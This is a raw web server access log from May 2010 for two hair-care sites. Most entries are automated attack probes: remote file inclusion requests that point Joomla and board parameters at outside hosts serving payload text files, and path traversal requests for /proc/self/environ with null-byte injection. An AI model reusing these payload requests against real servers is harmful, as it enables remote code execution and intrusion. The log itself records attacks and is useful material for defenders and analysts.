77.79.245.1 - - [31/May/2010:04:04:01 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:04:01 -0700] "GET /logs/access_100412.log%20%20//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:04:43 -0700] "GET /logs/access_100412.log//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:04:46 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:04:46 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:05:08 -0700] "GET /logs/access_100412.log//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:05:08 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:05:08 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:05:53 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:05:53 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:05:55 -0700] "GET /logs/access.log//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:06:07 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:06:07 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:06:12 -0700] "GET /logs/access.log//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:06:41 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:06:41 -0700] "GET /logs/access_100412.log//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:06:41 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:06:53 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:06:53 -0700] "GET /logs/access_100412.log//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:06:53 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:07:16 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:07:17 -0700] "GET /logs/access.log%20%20//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:07:17 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:07:17 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:07:17 -0700] "GET /logs/access.log%20%20//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [31/May/2010:04:07:17 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [31/May/2010:04:07:49 -0700] "GET /logs/access_100412.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:04:07:49 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:04:07:49 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:04:07:49 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:04:07:49 -0700] "GET /logs/access_100412.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:04:07:49 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.14.66 - - [31/May/2010:04:08:52 -0700] "GET /logs/access_100405.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:04:09:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6318 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
69.175.14.66 - - [31/May/2010:04:09:56 -0700] "GET /logs/access_100412.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [31/May/2010:04:10:04 -0700] "GET /logs/?DNC=http://www.fimaonline.org/1.txt? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [31/May/2010:04:10:04 -0700] "GET /?DNC=http://www.fimaonline.org/1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [31/May/2010:04:10:04 -0700] "GET /logs/access_100125.log/?DNC=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [31/May/2010:04:10:13 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12062 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:04:10:17 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13968 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:04:10:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15597 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:04:10:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16234 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
219.240.36.36 - - [31/May/2010:04:10:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
208.115.111.245 - - [31/May/2010:04:10:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16604 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:04:10:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17098 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:04:10:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17622 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:04:10:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17995 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:04:10:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9348 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [31/May/2010:04:10:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9845 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
121.88.4.141 - - [31/May/2010:04:12:10 -0700] "GET /logs/access_100412.log/?DNC=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:04:13:32 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:04:13:32 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [31/May/2010:04:13:41 -0700] "GET /?DNC=http://www.fimaonline.org/1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [31/May/2010:04:13:41 -0700] "GET /logs/?DNC=http://www.fimaonline.org/1.txt? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [31/May/2010:04:13:44 -0700] "GET /logs/access.log/?DNC=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.143.166 - - [31/May/2010:04:25:14 -0700] "GET //bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.221.143.163 - - [31/May/2010:04:25:28 -0700] "GET //bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:31:09 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:31:46 -0700] "GET /logs/access_100322.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:31:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:31:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:33:15 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:04:33:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=111 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.221.143.166 - - [31/May/2010:04:34:15 -0700] "GET //bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.221.143.163 - - [31/May/2010:04:34:15 -0700] "GET //bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.210.98.40 - - [31/May/2010:04:34:18 -0700] "GET /logs/access_100510.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:36:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.210.98.40 - - [31/May/2010:04:38:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.210.98.40 - - [31/May/2010:04:39:16 -0700] "GET /logs/access_100315.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:39:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:39:17 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:40:05 -0700] "GET /logs/access_100329.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:04:44:12 -0700] "GET /logs/access_100201.log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:04:44:17 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:04:44:18 -0700] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:04:47:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14301 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
68.10.208.161 - - [31/May/2010:04:47:37 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.10.208.161 - - [31/May/2010:04:47:41 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
77.221.143.166 - - [31/May/2010:04:48:28 -0700] "GET /logs/access_100301.log///bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.221.143.166 - - [31/May/2010:04:48:29 -0700] "GET //bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.221.143.166 - - [31/May/2010:04:48:29 -0700] "GET /logs///bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.221.143.166 - - [31/May/2010:04:48:48 -0700] "GET /logs/access_100308.log///bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.117.209.213 - - [31/May/2010:04:51:57 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
65.49.28.194 - - [31/May/2010:04:51:57 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
77.221.143.163 - - [31/May/2010:04:52:06 -0700] "GET /logs/access_100301.log///bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.221.143.163 - - [31/May/2010:04:52:06 -0700] "GET //bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.221.143.163 - - [31/May/2010:04:52:06 -0700] "GET /logs///bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.210.98.40 - - [31/May/2010:04:52:08 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.210.98.40 - - [31/May/2010:04:52:08 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.210.98.40 - - [31/May/2010:04:52:08 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.221.143.163 - - [31/May/2010:04:52:35 -0700] "GET /logs/access_100308.log///bbs/write_update.php?board_skin_path=http://pilihan.fileave.com/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.117.209.213 - - [31/May/2010:04:52:47 -0700] "GET /logs/access_100510.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.117.209.213 - - [31/May/2010:04:52:48 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
219.117.209.213 - - [31/May/2010:04:52:48 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.72.226.120 - - [31/May/2010:04:52:51 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
65.49.28.194 - - [31/May/2010:04:52:55 -0700] "GET /logs/access_100510.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
65.49.28.194 - - [31/May/2010:04:52:55 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
65.49.28.194 - - [31/May/2010:04:52:56 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
65.49.28.194 - - [31/May/2010:04:53:13 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
65.49.28.194 - - [31/May/2010:04:53:14 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
65.49.28.194 - - [31/May/2010:04:53:14 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
219.117.209.213 - - [31/May/2010:04:53:35 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
65.49.28.194 - - [31/May/2010:04:53:52 -0700] "GET /logs/access_100412.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
65.49.28.194 - - [31/May/2010:04:54:48 -0700] "GET /logs/access_100510.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
65.49.28.194 - - [31/May/2010:04:54:48 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
65.49.28.194 - - [31/May/2010:04:54:49 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
